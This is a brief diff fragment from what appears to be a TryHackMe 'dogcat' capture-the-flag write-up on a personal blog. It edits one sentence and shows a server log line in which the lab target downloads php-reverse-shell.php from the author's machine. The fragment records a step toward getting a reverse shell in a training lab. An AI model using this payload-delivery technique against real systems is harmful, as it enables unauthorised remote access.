F3dai/f3dai.github.io/_posts/2020-06-06-dogcat-Tryhackme.md

 Connection: close
 Upgrade-Insecure-Requests: 1</pre>

-Once this was done, I had a confirmation of a download from the simple HTTP server:
+Once this was done, I had a confirmation of a download from the simple HTTP server on my local machine:

 <pre>10.10.235.173 - - [06/Jun/2020 08:15:48] "GET /php-reverse-shell.php HTTP/1.0" 200 -</pre>